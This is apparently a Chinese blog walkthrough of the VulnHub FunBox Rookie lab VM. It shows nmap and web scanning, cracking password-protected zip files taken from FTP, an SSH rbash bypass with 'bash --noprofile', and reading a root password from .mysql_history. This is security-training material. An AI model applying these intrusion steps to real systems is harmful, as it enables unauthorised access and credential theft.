vulnhub靶场之FunBox-2

一.环境搭建

1.靶场描述

复制代码
Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.
This VM is created/tested with Virtualbox. Maybe it works with vmware.
If you need hints, call me on twitter: @0815R2d2
Have fun...
This works better with VirtualBox rather than VMware. 
复制代码

2.靶场下载

复制代码
https://www.vulnhub.com/entry/funbox-rookie,520/
复制代码

3.靶场启动

复制代码
虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.2.0/24
复制代码

二.信息收集

1.寻找靶场真实ip地址

复制代码
nmap -sP 192.168.2.0/24
复制代码
复制代码
arp-scan -l
复制代码
复制代码
我们通过上面2个命令,知道靶场真实ip地址为192.168.2.4
复制代码

2.探测端口及服务

复制代码
nmap -p- -sV 192.168.2.4
复制代码
复制代码
发现开启了21端口,服务为ProFTPD 1.3.5e
发现开启了22端口,服务为OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
发现开启了80端口,服务为Apache httpd 2.4.29 ((Ubuntu))
复制代码

三.渗透测试

1.访问web服务

复制代码
http://192.168.2.4
复制代码

是一个apache2服务页面

复制代码
ftp://192.168.2.4
复制代码

我们可以看到很多的压缩包文件

2.扫描web服务

1)棱洞3.0指纹识别

复制代码
./EHole_linux_amd64 finger -u http://192.168.2.4
复制代码

没有有用的信息

2)nikto扫描网站结构

复制代码
nikto -h http://192.168.2.4
复制代码

扫描到一个有用的信息,是robots.txt

3)disearch目录扫描

复制代码
dirsearch -u 192.168.2.4 -e * -x 403 --random-agent
复制代码

没有什么新的发现,最后有用的信息是一个robots.txt目录和ftp服务

3.渗透测试

1)访问robots.txt目录

复制代码
http://192.168.2.4/robots.txt
复制代码
复制代码
http://192.168.2.4/logs
复制代码

我们可以看到报错了,那么这个办法是行不通的,我们换一个思路,我们查看ftp访问

2)访问ftp服务

我们看到好多的压缩包而且都是加密的,我们进行爆破

新建一个 MS02423文件夹把下载的压缩包文件都放进去发现里面都是加密的 id_rsa再把 /usr/share/wordlists/rockyou.txt字典 复制进去

3)爆破密码

复制代码
这里破解出了两个用户的密码分别是:catwoman 和 iubire
复制代码

4)ssh私钥登录

复制代码
ssh -i id_rsa [email protected]
复制代码

我们通过密码获取到tom的私钥,我们进行登录

我们可以看到登录成功

登入后发现 是普通权限 这里被限制了 -rbsh需要绕过rbash

复制代码
ssh -i id_rsa [email protected] -t "bash --noprofile"
复制代码

我们可以看到成功绕过,我们查看home目录下的文件

我们可以在tom文件夹里面看见一个.mysql_history文件,我们进行查看

复制代码
我们可以看到tom的密码是xx11yy22!
复制代码

5)提权

我们知道tom的密码了,那么我们直接进行登录

我们可以看到权限是root,我们直接查看flag

至此获取到了所有得flag,渗透测试结束。

相关推荐
独行soc3 小时前
2025年渗透测试面试题总结-某腾某讯-技术安全实习生升级(题目+回答)
java·python·安全·web安全·面试·职场和发展·红蓝攻防
神经毒素3 小时前
WEB安全--文件上传漏洞--其他绕过方式
安全·web安全·文件上传漏洞
予安灵3 小时前
XSS 攻击(详细)
前端·web安全·网络安全·网络攻击模型·xss·安全架构·xss攻击
it技术分享just_free6 小时前
软考教材重点内容 信息安全工程师 第21章 网络设备安全
web安全·网络安全·信息安全·系统安全·软考
安全方案12 小时前
精心整理-2024最新网络安全-信息安全全套资料(学习路线、教程笔记、工具软件、面试文档).zip
笔记·学习·web安全
神经毒素13 小时前
WEB安全--文件上传漏洞--一句话木马的工作方式
网络·安全·web安全·文件上传漏洞
go_to_hacker17 小时前
AI进行全自动渗透
网络·web安全·网络安全·渗透测试·代码审计
virelin_Y.lin18 小时前
系统与网络安全------Windows系统安全(4)
windows·web安全·系统安全·账号安全
予安灵21 小时前
《白帽子讲 Web 安全》之服务端请求伪造(SSRF)深度剖析:从攻击到防御
前端·安全·web安全·网络安全·安全威胁分析·ssrf·服务端请求伪造
sszdlbw1 天前
文件包含漏洞的小点总结
服务器·安全·web安全·php